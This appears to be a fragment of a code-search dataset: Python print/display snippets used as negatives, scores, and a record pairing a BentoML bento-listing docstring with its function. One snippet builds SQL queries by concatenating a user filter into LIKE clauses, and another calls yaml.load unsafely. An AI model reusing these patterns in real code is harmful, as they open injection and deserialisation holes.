"def detailedInfo(cls):\n return 'tbd'",
"def print_transactions_for_review(self, budget: Budget) -> None:\n print(f'Please review the following transactions in the {budget.name} '\n f'budget:')\n transactions = self.get_transactions_by_budget(budget.category)\n for transaction in transactions:\n print(transaction)",
"def printTweet(descr, tweet):\n\tprint(descr)\n\tprint(\"Username: %s\" % t.username)\n\tprint(\"Retweets: %d\" % t.retweets)\n\tprint(\"Text: %s\" % t.text)\n\tprint(\"Mentions: %s\" % t.mentions)\n\tprint(\"Hashtags: %s\\n\" % t.hashtags)",
"def tell(self):\n print('Name {}, Age {}'. format(self.name, self.age), end=\" \")",
"def pull(bento_tag: str, force: bool) -> None: # type: ignore (not accessed)\n yatai_client.pull_bento(bento_tag, force=force)",
"def print_post():\n print('| | |'),",
"def func(self):\n if not self.args:\n return self.display_tags()\n super(CmdArxTag, self).func()",
"def print_info(task_state, video_state):\n os.system('clear')\n\n # instructions\n blue_bg('\\n Instructions ')\n orange_fg('\\u21e6 / \\u21e8:\\t', '1 frame back/forward')\n orange_fg('\\u21e9 / \\u21e7:\\t', '10 frame back/forward')\n orange_fg('< / >:\\t', '100 frame back/forward')\n orange_fg('[ / ]:\\t', 'Previous/next task/video')\n orange_fg('Esc:\\t', 'Exit')\n orange_fg('0-9:\\t', 'Action ID')\n orange_fg('t / i:\\t', '[User Input] Jump to Task/Image ID')\n orange_fg('Space:\\t', 'Toggle text color')\n orange_fg('Tab:\\t', 'Toggle lookahead mode')\n red_fg('Note:\\t', '(a) Select image as active window (b) Turn off Caps Lock (c) Do not press shift key')\n\n # state information\n blue_bg('\\n State ')\n orange_fg('Video ID: ', '{}\\t'.format(task_state.tasks[task_state.task_idx]), newline=False)\n orange_fg('Frame ID: ', '{}'.format(video_state.get_image_name()))\n orange_fg('Image ID: ', '{}/{}'.format(video_state.image_idx + 1, video_state.num_frames))\n orange_fg('Action ID: ', video_state.get_image_label())\n\n # action dictionary and key mapping\n blue_bg('\\n Actions List ')\n for a, action in enumerate(task_state.actions):\n orange_fg('Action {}: '.format(a + 1), action)\n\n # annotations\n blue_bg('\\n Actions Record ')\n for frame_idx, (f, a) in enumerate(video_state.labels.items()):\n orange_fg('Label {}: '.format(frame_idx + 1), '{} --> {}'.format(f, a))",
"def display(self):\r\n\t\ts = self.options['space']\r\n\t\tv = self.level\r\n\t\tp = self.options['sep']\r\n\t\tt = self.options['tab']\r\n\t\tb = self.options['bullet']\r\n\t\tprint(v*t+b+s+self.abbrev+s+p+s+self.text)",
"def pretty_print_drt(self):\n self.drt_manager.pretty_print_drt()",
"def _printable(self):\n pass",
"def display_bag_info(bag_name):\n\n \"\"\" Get the bag file summary info \"\"\"\n bag_info = yaml.load(subprocess.Popen(\n ['rosbag', 'info', '--yaml', bag_name], stdout=subprocess.PIPE).communicate()[0])\n\n \"\"\" Get the topics in the bag \"\"\"\n bag_topics = bag_info['topics']\n bag = rosbag.Bag(bag_name)\n\n \"\"\" For every topic in the bag, display its fields. Only do this once per topic \"\"\"\n for topic in bag_topics:\n for _, msg, _ in bag.read_messages(topics=topic['topic']):\n \"\"\" Recursively list the fields in each message \"\"\"\n print_topic_fields(topic['topic'], msg, 0)\n print('')\n break\n\n bag.close()\n\n sys.stdout.write(\"Found %u topics\\n\" % len(bag_topics))",
"def __str__(self):\n return str(self.tag)",
"def printer(obj, ident=''):\n import inspect\n print ident + obj.__class__.__name__.upper()\n ident += ' '\n lists = []\n for name in dir(obj):\n elem = getattr(obj, name)\n if isinstance(elem, list) and name != u'decoded_content':\n lists.append(elem)\n elif not inspect.ismethod(elem):\n if not name.startswith('__'):\n if name == u'data' and elem:\n print ident + u'data = '\n printer(elem, ident + ' ')\n else:\n print ident + u'%s\\t= %s' % (name, getattr(obj, name))\n for l in lists:\n for i in l:\n printer(i, ident + ' ')",
"def printer(obj, ident=''):\n import inspect\n print ident + obj.__class__.__name__.upper()\n ident += ' '\n lists = []\n for name in dir(obj):\n elem = getattr(obj, name)\n if isinstance(elem, list) and name != u'decoded_content':\n lists.append(elem)\n elif not inspect.ismethod(elem):\n if not name.startswith('__'):\n if name == u'data' and elem:\n print ident + u'data = '\n printer(elem, ident + ' ')\n else:\n print ident + u'%s\\t= %s' % (name, getattr(obj, name))\n for l in lists:\n for i in l:\n printer(i, ident + ' ')",
"def print_cbt(msg: str, color: str = \"\", bright: bool = False, tag: str = \"\", end=\"\\n\"):\n brgt = Style.BRIGHT if bright else \"\"\n\n if not isinstance(tag, str):\n raise pyrado.TypeErr(given=tag, expected_type=str)\n else:\n if tag != \"\":\n tag = f\"[{tag}] \"\n\n color = color.lower()\n if color in [\"\", \"w\", \"white\"]:\n print(brgt + tag + msg + Style.RESET_ALL, end=end)\n elif color in [\"y\", \"yellow\"]:\n print(Fore.YELLOW + brgt + tag + msg + Style.RESET_ALL, end=end)\n elif color in [\"b\", \"blue\"]:\n print(Fore.BLUE + brgt + tag + msg + Style.RESET_ALL, end=end)\n elif color in [\"g\", \"green\"]:\n print(Fore.GREEN + brgt + tag + msg + Style.RESET_ALL, end=end)\n elif color in [\"r\", \"red\"]:\n print(Fore.RED + brgt + tag + msg + Style.RESET_ALL, end=end)\n elif color in [\"c\", \"cyan\"]:\n print(Fore.CYAN + brgt + tag + msg + Style.RESET_ALL, end=end)\n else:\n raise pyrado.ValueErr(given=color, eq_constraint=\"'y', 'b', 'g', 'r', or 'c'\")",
"def execute_print_chain(arg):\n blockchain = Blockchain()\n blockchain.read_blockchain()\n blockchain.print_blocks()",
"def info(releaser):\n click.echo(\"\\n\".join(releaser.get_info()))",
"async def slashtag_info(self, ctx: commands.Context, *, tag: TagConverter):\n await tag.send_info(ctx)",
"async def info(self, ctx, *, tag):\n try:\n self.fetch_tag(ctx, tag)\n except Exception as error:\n return await ctx.send(error)\n data = self._tag_dict[ctx.guild.id][tag]\n author = self.bot.get_user(data['author']) or await self.bot.fetch_user(data['author'])\n embed = discord.Embed(colour=self.bot.colour)\n embed.title = tag\n embed.description = f\"<:author:734991429843157042> **{author}**\\n\"\n embed.description += f\"Uses: **{data['uses']}**\\n\"\n embed.description += f\"ID: **{data['id']}**\"\n embed.set_author(name=str(author), icon_url=author.avatar_url)\n await ctx.send(embed=embed)",
"def display_log(obj, title=None, show=False):\n print(obj)",
"def output_debug_info(self):",
"def print_item(self, tabs=1):\n \n print(\"\\n\\tOrder Item Id: %s\" % self.metadata['itemId'])\n print(\"\\tOrder Id: %s\" % self.metadata['orderId'])\n print(\"\\tRecord Id: %s\" % self.metadata['recordId'])\n for m, v in self.metadata.items():\n if m == 'itemId' or m == 'orderId' or m == 'recordId': continue\n print(\"%s%s: %s\" % (str('\\t' * tabs), m, v))",
"def printme_text(self, line):\n self.otag.printme_text(line)",
"def printer(self, dictionary_db):\n tf = \"tf : %s\" % self.tf\n # insert the tf line before the idf\n s = self.word_info(dictionary_db).__str__().split(\"\\n\")\n r = s[:3] + [tf] + [s[-1]]\n return \"\\n\".join(r)",
"def do_show(self, arg):\n obj = self.verify(arg, 1)\n if obj:\n print(obj)",
"def print_account(account):\r\n markets_output = \"\"\r\n for market in account.get_market_segments():\r\n markets_output += market.name.strip(\"\\'\") + \", \"\r\n markets_output = markets_output.strip(\"\\'\")\r\n print(f'{account.name} ({markets_output[:-2]}): {account.get_sales_rep()}')",
"def PrettyPrint(self):\r\n print(self.data)\r\n return",
"def print_class_dict_rough(self):\n for tag in self.post_div.find_all(\"b\"):\n if tag.next_sibling is not None and tag.next_sibling.name == \"br\":\n text = str(tag.text).lower()\n while \" \" in text:\n text = text.replace(\" \", \"-\")\n i = 0\n while i < len(text):\n if not text[i].isalpha() and text[i] != \"-\":\n text = text[:i] + text[i + 1:]\n else:\n i += 1\n if len(text) > 0:\n if tag.find_next(\"a\") is not None:\n link = tag.find_next(\"a\")[\"href\"]\n else:\n link = \"\"\n print(\"\\\"\" + text + \"\\\":\\\"\" + link + \"\\\",\")",
"def pretty_print_item(item):\n title = item.title\n body = item.summary\n timestamp = item.published\n if not ARGV.get(RAW_OPT):\n #if not using raw also bold title\n title = BOLD + title + CLEAR\n h2t = html2text.HTML2Text()\n h2t.inline_links = False\n h2t.body_width = 85\n body = h2t.handle(body)\n print(title + '\\n' + timestamp + '\\n\\n' + body)",
"def print(self):\n print('Name:', self.name)\n print('Camera:', self.camera)\n print('Memory:', self.memory)\n print('Ram:', self.ram)\n print('Price:', self.price)\n print('Image:', self.image)",
"def _print(self, text):\n\t\tif self.verbose:\n\t\t\tprint text",
"def __str__(self):\n out = str(self.tag_pairs)\n if self.comment:\n out += \"{\" + self.comment + \"} \"\n out += self.format_body()\n return out",
"def printname(bruce):",
"def print_debug(context: str = \"\") -> None:\r\n print(context)\r\n print(\"This is the current board\")\r\n print(example)\r\n print(\"This is the conflict space\")\r\n print(conflict_space)\r\n print(\"This is the safeboard\")\r\n print(safeboard)",
"def pprint(obj):\n for argname in sorted([x for x in dir(obj) if not x.startswith('__')]):\n # Skip callables\n if hasattr(getattr(obj, argname), '__call__'):\n continue\n print(\"{} : {}\".format(argname, getattr(obj, argname)))",
"def print_details(self):\n self.view.print_details()",
"def __str__(self):\n # only print the words, dont want to print the embeddings too\n return \"Stack: {}\\nInput Buffer: {}\\n\".format([ entry.headword for entry in self.stack ], \n [ entry.headword for entry in self.input_buffer[self.curr_input_buff_idx:] ])",
"def print_order_tags(self, print_order_tags):\n\n self._print_order_tags = print_order_tags",
"def print_business(business_object):\n # OLD ----------\n # print('Business name: ' + business_object['name'])\n # print('Address: ' + business_object['address'])\n # print('City: ' + business_object['city'])\n # print('State: ' + business_object['state'])\n # print('Average Ratings: ' + str(business_object['stars']) +\n # ' Review Count: ' + str(business_object['review_count']))\n # print('categories: ' + str(business_object['categories']))\n\n print(business_object['name'])\n print(f'Address: {business_object[\"address\"]}, '\n f'{business_object[\"city\"]}, {business_object[\"state\"]}')\n print('#############################')",
"def print_tags(self, filename):\n fh = open(filename, 'w')\n for t in self.source_tags.tags:\n fh.write(\"%d\\t%d\\t%s\" % (t.begin, t.end, t.name))\n for (attr, val) in t.attrs.items():\n fh.write(\"\\t%s=\\\"%s\\\"\" % (attr, val.replace('\"','"')))\n fh.write(\"\\n\")",
"def print(self):\n print(self.pretty_str())",
"def _repr_pretty_(self, p, cycle):\n self.__verify_repo_initialized()\n res = f'Hangar {self.__class__.__name__}\\\n \\n Repository Path : {self.path}\\\n \\n Writer-Lock Free : {heads.writer_lock_held(self._env.branchenv)}\\n'\n p.text(res)",
"def help_dump(self):\n print(DUMP)",
"def print_vscsi_attributes(self,objects):\n print(\"\\n\")\n print((\"LocalPartitionID\".ljust(35),\":\",objects.LocalPartitionID.value()))\n print((\"VirtualSlotNumber\".ljust(35),\":\",objects.VirtualSlotNumber.value()))\n print((\"RequiredAdapter\".ljust(35),\":\",objects.RequiredAdapter.value()))\n print((\"RemoteLogicalPartitionID\".ljust(35),\":\",objects.RemoteLogicalPartitionID.value()))\n print((\"RemoteSlotNumber\".ljust(35),\":\",objects.RemoteSlotNumber.value()))",
"def pprint(self):\n # just here for defining the interface; work is done in subclasses\n pass",
"def print_agent(agent):\n agent_string = \"FOUND:\\n\"\n for key in place_detail_keys:\n agent_string += \"\\t%s: %s\\n\" % (key, agent[key])\n log.debug(agent_string)",
"def displayhook(p_object): # real signature unknown; restored from __doc__\n pass",
"def print(self):\n # Your implementation here",
"def print_pos(self, byte_offset=-1):\n if self._debug_level > 3:\n if hasattr(self, 'ensemble'):\n k = self.ensemble.k\n else:\n k = 0\n print(' pos: %d, pos_: %d, nbyte: %d, k: %d, byte_offset: %d' %\n (self.f.tell(), self._pos, self._nbyte, k, byte_offset))",
"def bpprint(self, out=None):\n if out is None:\n out = sys.stdout\n print(self.bpformat(), file=out)",
"def describe_pet(animal, name):\r\n print(\"\\nI have a \" + animal + \".\")\r\n print(\"Its name is \" + name + \".\")",
"def hinfo(*objects, file=sys.stderr, flush=True, style=Fore.CYAN, **kwargs):\r\n with ScopedColoredStream(file, style, flush_on_exit=flush) as stream:\r\n print(*objects, file=stream, flush=False, **kwargs)",
"def print_tags(self):\n tags = [tag.name for tag in self.tags.all().order_by('name')]\n return \", \".join(tags) if tags else \"\"",
"def printt(content, flag=False):\n if flag:\n print(content)",
"def print_state(self):\n print(self.identifier, \n self.gender, \n self.age,\n self.sexual_activity,\n self.disease_status,\n self.time_since_infection,\n self.number_of_partners,\n self.current_partners)",
"def print_item(group):\n print(\"\\tName: {}\".format(group.name))\n print(\"\\tId: {}\".format(group.id))\n if hasattr(group, 'location'):\n print(\"\\tLocation: {}\".format(group.location))\n print_properties(getattr(group, 'properties', None))"
] | [
"0.59889174",
"0.5728905",
"0.56706613",
"0.56307644",
"0.5569425",
"0.5474408",
"0.5425949",
"0.54244584",
"0.5415978",
"0.5385348",
"0.53358155",
"0.5326319",
"0.5322443",
"0.5317626",
"0.5277394",
"0.52764267",
"0.5227435",
"0.5224774",
"0.5220987",
"0.5199572",
"0.5164107",
"0.5150359",
"0.514877",
"0.51372164",
"0.5133556",
"0.5131356",
"0.51305985",
"0.51263386",
"0.51262504",
"0.5125374",
"0.512511",
"0.51232696",
"0.5118873",
"0.51166296",
"0.51134217",
"0.5112508",
"0.5097552",
"0.5094875",
"0.50929403",
"0.5081634",
"0.5063973",
"0.5057993",
"0.5056457",
"0.5056457",
"0.50551665",
"0.5043804",
"0.5021302",
"0.50163233",
"0.50044125",
"0.49964106",
"0.49920362",
"0.49877962",
"0.49771473",
"0.49755406",
"0.4974986",
"0.49638215",
"0.49555904",
"0.49555904",
"0.49509498",
"0.4950834",
"0.4949914",
"0.49467248",
"0.4942187",
"0.49331284",
"0.49315047",
"0.49297842",
"0.49272087",
"0.49248806",
"0.49208713",
"0.4920582",
"0.49134144",
"0.49089247",
"0.49079606",
"0.49066326",
"0.49057236",
"0.4899713",
"0.48994008",
"0.4896269",
"0.4895942",
"0.48900846",
"0.48884305",
"0.48873472",
"0.48848",
"0.48842898",
"0.4881558",
"0.48811167",
"0.48771212",
"0.4873694",
"0.48683414",
"0.48676652",
"0.48642212",
"0.48616594",
"0.48564544",
"0.48415488",
"0.4836313",
"0.4835329",
"0.48289087",
"0.48259103",
"0.48219702",
"0.48146647"
] | 0.637782 | 0 |
List Bentos in local store \b show all bentos saved $ bentoml list \b show all versions of bento with the name FraudDetector $ bentoml list FraudDetector | def list_bentos(bento_name: str, output: str) -> None:  # type: ignore (not accessed)
bentos = bento_store.list(bento_name)
res = [
{
"tag": str(bento.tag),
"path": display_path_under_home(bento.path),
"size": human_readable_size(calc_dir_size(bento.path)),
"creation_time": bento.info.creation_time.astimezone().strftime(
"%Y-%m-%d %H:%M:%S"
),
}
for bento in sorted(
bentos, key=lambda x: x.info.creation_time, reverse=True
)
]
if output == "json":
info = json.dumps(res, indent=2)
console.print(info)
elif output == "yaml":
info = yaml.safe_dump(res, indent=2)
console.print(Syntax(info, "yaml"))
else:
table = Table(box=None)
table.add_column("Tag")
table.add_column("Size")
table.add_column("Creation Time")
table.add_column("Path")
for bento in res:
table.add_row(
bento["tag"],
bento["size"],
bento["creation_time"],
bento["path"],
)
console.print(table) | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def command_list(arguments):\n global current_mode\n current_mode = Mode.list\n #current_entity.addlink(arguments[0], arguments[1])\n return 'Now listing all entities'",
"def list_cmd(ctx):\n client = ctx.obj['CLIENT']\n models = client.list_models()\n\n x = PrettyTable()\n x.field_names = [\"Name\",\"Tag\",\"Created\"]\n for m in models:\n x.add_row([m[\"name\"],m[\"tag\"],m[\"uploaded_at\"]])\n print(x)",
"def _list():\n db = shelve.open(\"db\", flag='c', protocol=None, writeback=False)\n names_only = input(\"Names only [Y/n] ->\")\n\n if names_only == \"Y\":\n for name in db.keys():\n print(name)\n elif names_only == \"n\":\n for key in db.items():\n print(key, sep=' ', end='\\n', file=sys.stdout, flush=False)\n #print((\";\\n\".join(\"%s=>%s\" % i for i in db.items())))",
"def db_show_all():\n the_list = []\n db = sh.open(the_phone_book_name, flag='c', writeback=True)\n for key in db:\n person = Person()\n person.name = key\n person.phone = db[key]\n the_list.append(person)\n display_list(the_list)\n db.close()",
"def list(default_view):\n ListCommandExecutor(default_view).list()",
"def view_all(entities, table, db):\n print \n print \"TABLE:\",table\n for ii in entities:\n print ii\n print",
"def view_command():\n listing.delete(0, END)\n for row in backend.view():\n listing.insert(END, row)",
"def list(self, subcmd):\n\n self.__connect_db()\n tariffs = []\n\n for tariff in self.db.get_tariffs():\n tariffs.append(tariff.name)\n print(tariff.name)\n\n #print(\"\\n\".join(sorted(tariffs)))",
"def list():\n rino.remote.list()",
"def list():",
"def list():",
"async def get_pretty_vetoes(self) -> typing.List[str]:\n\n open_bills = await self.bot.db.fetch(\n \"SELECT id, name, link, link FROM bill WHERE is_vetoable = true AND status = $1 ORDER BY id\",\n models.BillPassedLegislature.flag.value,\n )\n\n if not open_bills:\n return []\n\n pretty_bills = []\n b_ids = []\n b_hyperlinks = []\n\n for record in open_bills:\n b_ids.append(f\"Bill #{record['id']}\")\n b_hyperlinks.append(\n f\"=HYPERLINK(\\\"{record['link']}\\\"; \\\"{record['name']}\\\")\"\n )\n pretty_bills.append(\n f\"Bill #{record['id']} - [{record['name']}]({record['link']})\"\n )\n\n exported = [\n f\"Export of Veto-able Bills -- {discord.utils.utcnow().strftime('%c')}\\n\\n\\n\",\n \"----- Veto-able Bills -----\\n\",\n ]\n\n exported.extend(b_ids)\n exported.append(\"\\n\")\n exported.extend(b_hyperlinks)\n\n link = await self.bot.make_paste(\"\\n\".join(exported))\n\n if link:\n pretty_bills.insert(\n 0,\n f\"[*View this list in Google Spreadsheets formatting for easy copy & pasting*]({link})\\n\",\n )\n\n return pretty_bills",
"async def __list(self, ctx):\n server = ctx.message.server\n if server.id not in self.db:\n self.db[server.id] = {}\n self.save_db()\n else:\n db = self.db[server.id]\n if \"bookkeeper\" not in self.db[server.id]:\n self.db[server.id][\"bookkeeper\"] = []\n self.save_db()\n await self.bot.say(\"Bookkeeper list is currently empty, add new bookkeepers using points keeper add\"\n \" <Discord name or nickname>\")\n return\n else:\n bookkeeper = db[\"bookkeeper\"][:]\n msg = \"\"\n for x in bookkeeper:\n bookkeeper[bookkeeper.index(x)] = discord.utils.find(lambda N: N.id == x, server.members).display_name\n bookkeeper = sorted(bookkeeper, key=lambda item: (int(item.partition(' ')[0])\n if item[0].isdigit() else float('inf'), item))\n msg = \", \".join(bookkeeper[:-2] + [\" and \".join(bookkeeper[-2:])])\n await self.bot.say(\"Current bookkeepers assigned are: {}\".format(msg))",
"async def list(self, ctx: MyContext):\n if ctx.subcommand_passed is None:\n await ctx.send_help(\"wormhole list\")",
"def do_bay_list(cs, args):\n bays = cs.bays.list(marker=args.marker, limit=args.limit,\n sort_key=args.sort_key,\n sort_dir=args.sort_dir)\n columns = ['uuid', 'name', 'node_count', 'master_count', 'status']\n columns += utils._get_list_table_columns_and_formatters(\n args.fields, bays,\n exclude_fields=(c.lower() for c in columns))[0]\n utils.print_list(bays, columns,\n {'versions': magnum_utils.print_list_field('versions')},\n sortby_index=None)",
"def ls(filter=None):",
"async def list(self, ctx):\n server = ctx.message.server\n if server.id not in self.db:\n self.db[server.id] = {}\n dataIO.save_json(\"data/lootbox/servers.json\", self.db)\n if len(self.db[server.id]) < 1:\n await self.bot.say(\"No boxes have been created for this server yet, please create some using [p]box create\"\n \" first, thanks\")\n return\n boxes = self.db[server.id].keys()\n await self.bot.say(\"Here are this server's boxes:\\n{}\".format(\"\\n\".join(boxes)))",
"def list_litnacionals_cmd():\n return ListLitnacionalCommand()",
"def listaSangre():\n san = SangreModel()\n\n return san.listarTodos()",
"def list_command(ctx: Any) -> None:\n pass",
"def view(args):\n print(\"List of all available phonebooks:\")\n for file in glob.glob(\"*.ph\"):\n print(file)",
"def do_all(self, line=None):\n\n if not line or line in HBNBCommand.class_list:\n dict_objects = storage.all()\n list_objects = []\n for key, obj in dict_objects.items():\n list_objects.append(obj.__str__())\n print(list_objects)\n else:\n print(\"** class doesn't exist **\")",
"def list_(ctx: click.Context, repository_path):\n root_commands.cmd_list(ctx.obj, repository_path)",
"async def blocklist(self, ctx):\n blocked = await self.db.get('blocked', [])\n if not blocked:\n return await ctx.send('🐱 There are no blocked images.')\n async with aiohttp.ClientSession() as session:\n async with session.post(f'{self.haste_url}/documents', data='\\n'.join(blocked)) as resp:\n return await ctx.send(f'🐱 Here is a list of blocked images\\n\\n{self.haste_url}/{resp[\"key\"]}.txt')",
"def do_command(self, args):\n vendorops = dbops.Vendors()\n listing = vendorops.list(args)\n ordering = ['vendor_name']\n do_list(listing, ordering)",
"def do_list(args):\n session = BMC(server=args.server, username=args.username, password=args.password)\n for i in session.list(args.path):\n print(i)",
"def view_all_batters(self):\n conn = rs.create_connection(\"dailyfantasyscraper.db\")\n cur = conn.cursor()\n position = \"P\"\n cur.execute(\"SELECT * FROM rotowiredk where position != ?\", position)\n result = cur.fetchall()\n conn.commit()\n conn.close()\n\n for item in result:\n print(item)\n tree.insert('', 'end', values=item)",
"def show():\n logger.info('List donors')\n try:\n logger.info('Connecting to database...')\n database.connect()\n database.execute_sql('PRAGMA foreign_keys = ON;')\n for i in Donor.select().order_by(Donor.donor_name):\n print(i)\n except Exception as e:\n logger.info(e)\n finally:\n database.close()",
"def command_ls(self, list_what):\n if list_what in ('available', 'mounted', 'unmounted'):\n callback = getattr(self.environment, 'get_%s_ids' % list_what)\n lst = callback()\n else:\n lst = []\n if len(lst) != 0:\n print((\"\\n\".join(lst)))",
"def list(self):",
"async def list(self, *args, **kwargs):\n return f\"Command list: {', '.join(self.get_commands())}\"",
"def list_command(*, login_manager: LoginManager):\n search_client = login_manager.get_search_client()\n formatted_print(\n search_client.get(\"/v1/index_list\"),\n fields=INDEX_LIST_FIELDS,\n text_format=FORMAT_TEXT_TABLE,\n response_key=\"index_list\",\n )",
"def list(\n self,\n name,\n ):\n pass",
"def printdonorlist():\n for name in donor_db:\n print(name)",
"def do_list_availble_books(self, line):\n\t\tprint('\\nBooks in your current directory: \\n')\n\t\tfor i in os.listdir():\n\t\t\tif i.endswith('.bin'):\n\t\t\t\tprint(i)\n\t\tprint('\\n')",
"def do_list(self, line):\n\t\tx = [i for i in self.client.list_databases() if i['name'] not in ['admin','config','line','local','mongoengine_test','pymongo_test']]\n\t\tfor db in x:\n\t\t\tprint(db['name'])",
"def list(self):\n return {'klanten': self.request.db.query(models.Klant).all()}",
"def cmd_list(self):\n rc = self.socket_command('list', False)\n return rc",
"def main(appinfo, args):\n parser = optparse.OptionParser(\n usage='%prog list [OPTS] [--] [SEARCH..]',\n )\n parser.add_option(\n '-v', '--verbose',\n help='show more information',\n action='count',\n )\n parser.add_option(\n '--tag',\n help='only list tickets having this tag',\n action='append',\n )\n parser.add_option(\n '--order',\n help='sort listing according to criteria',\n )\n parser.add_option(\n '--hide',\n metavar='FIELD',\n help='hide field from listing',\n )\n parser.add_option(\n '--show',\n metavar='FIELD',\n help='show field in listing',\n )\n (options, args) = parser.parse_args(args)\n\n if args:\n raise NotImplementedError(\n 'TODO Full text search not supported yet.')\n\n def list_tickets():\n for (mode, type_, object, basename) in storage.git_ls_tree(\n path='',\n children=True,\n ):\n yield basename\n\n for ticket in list_tickets():\n number = storage.get(os.path.join(ticket, 'number'))\n if number is not None:\n number = number.rstrip()\n ident = '#%s' % number\n else:\n ident = ticket[:7]\n description = storage.get(os.path.join(ticket, 'description')).rstrip()\n tags = set(storage.ls(os.path.join(ticket, 'tags')))\n if options.tag:\n must = frozenset(options.tag)\n if not tags & must:\n continue\n tags = tagsort.human_friendly_tagsort(tags)\n if options.verbose:\n raise NotImplementedError\n if options.order:\n raise NotImplementedError\n if options.show:\n raise NotImplementedError\n if options.hide:\n raise NotImplementedError\n (title, description) = util.extract_title(description)\n print '%(ident)s\\t%(title)s' % dict(\n ident=ident,\n title=title,\n )\n if tags:\n print textwrap.fill(\n ' '.join(tags),\n initial_indent=' ',\n subsequent_indent=' ',\n break_long_words=False,\n )",
"def show_list():\n\n response = []\n docs = SUPERHEROES.stream()\n for doc in docs:\n response.append(doc.to_dict())\n return jsonify(response), 201",
"async def bot_list(self) -> list:\n return await self._do_request(\"get\", botlist_address, self._user_auth)",
"def list_(args):\n osf = _setup_osf(args)\n\n project = osf.project(args.project)\n\n for store in project.storages:\n prefix = store.name\n for file_ in store.files:\n path = file_.path\n if path.startswith('/'):\n path = path[1:]\n\n print(os.path.join(prefix, path))",
"def bmark_list(request):\r\n # Removed because view was deprecated\r\n return bmarks.recent(request)",
"def list():\n\n click.secho('List of libraries in SJSU-Dev2\\n', fg='white', bold=True)\n package_registry = GetListOfSJSUDev2Repos()\n library_list = [f'{x : <20}: {package_registry[x]}'\n for x in package_registry if x.startswith('lib')]\n print('\\n'.join(library_list))",
"def bentity_list(request, format='csv'):\n \n \n bentities = Bentity.objects.all().order_by('bentity')\n \n \n if format == 'csv':\n # Serislize CSV for API\n return CSVResponse(\n [{'bentity_id': b.gid, 'bentity_name': b.bentity} for b in bentities],\n ('bentity_id', 'bentity_name') )\n \n else:\n # Serialize JSON for bentity-list widget\n json_objects = [{\n 'key': b.gid,\n 'display': b.bentity,\n } for b in bentities]\n \n return JSONResponse({'bentities' : json_objects})",
"def lista_ventas(self,tipo,lista,filtro):\n self.lista=self.builder.get_object(lista)\n self.lista.clear()#Limpia la lista\n busqueda = \"\"\n\n if tipo==\"\":\n print(\"Llego a buscar ventas en BD\")\n #result=self.db.execute('SELECT * FROM Venta')\n busqueda = self.db.execute('SELECT ventaID ,fechaVenta, fechaInicio, fechaFin, C.nombre, P.nombre FROM Cliente C, Paquete P, Venta V WHERE V.IdCli = C.clienteID AND V.IdPaq = P.paqueteID')\n elif tipo == \"Cliente\":\n print(\"Busco venta por nombre del cliente\")\n busqueda = self.db.execute(\"SELECT ventaID ,fechaVenta, fechaInicio, fechaFin, C.nombre, P.nombre FROM Cliente C, Paquete P, Venta V WHERE V.IdCli = C.clienteID AND V.IdPaq = P.paqueteID AND C.nombre LIKE '%\"+filtro+\"%'\")\n elif tipo == \"Viaje\":\n print(\"Busco venta por nombre del paquete\")\n busqueda = self.db.execute(\"SELECT ventaID ,fechaVenta, fechaInicio, fechaFin, C.nombre, P.nombre FROM Cliente C, Paquete P, Venta V WHERE V.IdCli = C.clienteID AND V.IdPaq = P.paqueteID AND P.nombre LIKE '%\"+filtro+\"%'\")\n elif tipo == \"Fecha de inicio\":\n print(\"Busco venta por fecha de inicio\")\n busqueda = self.db.execute(\"SELECT ventaID ,fechaVenta, fechaInicio, fechaFin, C.nombre, P.nombre FROM Cliente C, Paquete P, Venta V WHERE V.IdCli = C.clienteID AND V.IdPaq = P.paqueteID AND fechaInicio LIKE '%\"+filtro+\"%'\")\n elif tipo == \"Fecha de fin\":\n print(\"Busco venta por fecha de fin\")\n busqueda = self.db.execute(\"SELECT ventaID ,fechaVenta, fechaInicio, fechaFin, C.nombre, P.nombre FROM Cliente C, Paquete P, Venta V WHERE V.IdCli = C.clienteID AND V.IdPaq = P.paqueteID AND fechaFin LIKE '%\"+filtro+\"%'\")\n \n for row in busqueda: \n #Empieza por la [1] porque el ID es la [0]\n # self.lista.append([row[4],row[5],row[1],row[2],row[3]])\n self.lista.append([row[1],row[2],row[3],row[4],row[5],row[0]])\n print(\"Listo ventas en tabla\")",
"def show(args, syn):\n \n ent = syn.get(args.id, downloadFile=False)\n syn.printEntity(ent)",
"def do_all(self, line):\n list_line = line.split(' ')\n string = \"\"\n list_all = []\n if line == \"\":\n for key, value in models.storage.all().items():\n string = str(value)\n list_all.append(string)\n print(list_all)\n elif list_line[0] not in HBNBCommand.classes.keys():\n print(\"** class doesn't exist **\")\n else:\n for key, value in models.storage.all().items():\n if value.__class__.__name__ == list_line[0]:\n string = str(value)\n list_all.append(string)\n print(list_all)",
"def list_branches():\n a = App()\n print(tabulate(a.list_branches(), tablefmt=\"fancy_grid\"))",
"def browse_mentors(request):\n all_mentors = Mentor.objects.all()\n mentors = [mentor for mentor in all_mentors if mentor.mentor.has_capacity()]\n return render(request, 'match/browse_mentors.html', {'mentors': mentors})",
"def showTables():\n global cursor\n #cursor.execute('SELECT * FROM *')\n cursor.execute('''SELECT * FROM sqlite_master WHERE type='table' ''')\n\n tables = cursor.fetchall()\n print \"Tables available are:\"\n print tables[0]",
"def do_list(self, args):\n if args.option == 'config':\n print(list_config())\n if args.option == 'queries':\n for k,v in list_queries().items():\n print(k, \":\", json.dumps(v, indent=4))\n if args.option == 'jobs':\n update_jobs(CLI_GLOBALS.ENGAGEMENT)\n for k,v in list_jobs().items():\n print(k, \":\", json.dumps(v, indent=4))\n if args.option == 'results':\n for i in list_results():\n print(i)\n if args.option == 'key':\n for k,v in list_key().items():\n print(k, \":\", json.dumps(v, indent=4))\n if args.option == 'engagement':\n print(list_engagement())",
"def ls():",
"def book_list(request):\n\tbooks = Book.objects.all()\n\tif not books:\n\t\tmessages.info(request, \"There is no book registered in the current system\")\n\treturn render(request, 'BookManagement/book_list.html', {'books': books})",
"def list(request):\n files = PoFile.objects.all()\n return render_to_response('poeditor/list.html', {\n 'files' : files,\n }, context_instance=RequestContext(request))",
